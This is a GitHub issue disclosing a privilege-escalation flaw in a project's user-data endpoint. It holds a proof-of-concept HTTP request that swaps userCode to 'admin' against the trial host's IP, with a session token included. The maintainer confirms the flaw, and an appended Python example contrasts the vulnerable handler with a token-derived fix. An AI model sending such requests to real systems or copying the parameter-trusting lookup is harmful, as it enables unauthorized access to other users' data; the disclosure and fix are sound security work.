
There is a broken access control (privilege escalation) vulnerability in viewing the personal center

Open aooboo opened this issue 4 years ago • 1 comment

Log in with the user1 account on the trial website given by the author, click the personal center and capture the request. The userCode parameter has a vulnerability. PoC: user1 login --> /api/user/userData?userCode=admin

GET /api/user/userData?userCode=admin HTTP/1.1
Host: 8.129.86.120
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
Connection: close
Referer: http://8.129.86.120/
Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ


aooboo avatar Jul 28 '21 06:07 aooboo

This problem does exist. In this case, the userCode should be parsed and obtained from the token rather than passed through parameters. Thanks for reminding.

cdfan avatar Jul 30 '21 07:07 cdfan
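The maintainer's fix, shown as an added example that is not code from the my-admin project or from either participant. The page does not state the project's language, so Python with only the standard library is assumed here; the token layout (HS256, `sub` holding a JSON string with `userCode`, `myadmin-token` header) mirrors the token visible in the issue, while the signing secret, the `USERS` store and the two handler functions are constructed for the demonstration. The vulnerable handler authenticates the token but selects the record by the client-supplied `userCode` query parameter; the fixed handler takes `userCode` from the verified token's `sub` claim and ignores the parameter.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed demo secret (assumption); a real deployment loads it from configuration.
SECRET = b"demo-signing-key-not-for-production"


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWTs use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    """Inverse of _b64url; restores the stripped '=' padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user_code: str, user_id: int, ttl: int = 3600) -> str:
    """Mint an HS256 token shaped like the one in the issue: sub is a JSON
    string carrying userCode/userId, iss is the user code."""
    header = {"alg": "HS256"}
    now = int(time.time())
    payload = {
        "jti": str(user_id),
        "iss": user_code,
        "sub": json.dumps({"userCode": user_code, "userId": user_id}),
        "iat": now,
        "exp": now + ttl,
    }
    signing_input = (
        f"{_b64url(json.dumps(header).encode())}."
        f"{_b64url(json.dumps(payload).encode())}"
    )
    sig = hmac.new(SECRET, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def verify_token(token: str) -> dict:
    """Check structure, algorithm, HMAC signature and expiry; return the
    decoded payload or raise PermissionError."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        raise PermissionError("malformed token")
    expected = hmac.new(SECRET, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(s)):
        raise PermissionError("bad signature")
    header = json.loads(_b64url_decode(h))
    if header.get("alg") != "HS256":
        raise PermissionError("unexpected alg")
    payload = json.loads(_b64url_decode(p))
    if payload.get("exp", 0) < time.time():
        raise PermissionError("token expired")
    return payload


# Constructed user store standing in for the application's database (assumption).
USERS = {
    "user1": {"userCode": "user1", "userName": "user 1", "roleList": [6]},
    "admin": {"userCode": "admin", "userName": "administrator", "roleList": [1]},
}


def user_data_vulnerable(query: dict, headers: dict) -> dict:
    """Mirrors the reported behaviour of /api/user/userData: the token is
    verified (authentication), but the record returned is chosen by the
    client-controlled userCode parameter (no authorization check)."""
    verify_token(headers["myadmin-token"])
    return USERS[query["userCode"]]


def user_data_fixed(_query: dict, headers: dict) -> dict:
    """Maintainer's suggested fix: derive userCode from the verified token's
    sub claim and ignore the query parameter entirely, so a caller can only
    ever read their own record."""
    payload = verify_token(headers["myadmin-token"])
    subject = json.loads(payload["sub"])
    return USERS[subject["userCode"]]


if __name__ == "__main__":
    token = issue_token("user1", 18)
    request = ({"userCode": "admin"}, {"myadmin-token": token})
    print("vulnerable:", user_data_vulnerable(*request)["userCode"])  # admin
    print("fixed:     ", user_data_fixed(*request)["userCode"])       # user1
```

The key design point is that identity used for data selection must come from something the server has verified (the signed token), never from a parameter the client can rewrite. If an admin legitimately needs to view another user's record, that should be a separate, role-checked endpoint rather than an unchecked parameter on the self-service one.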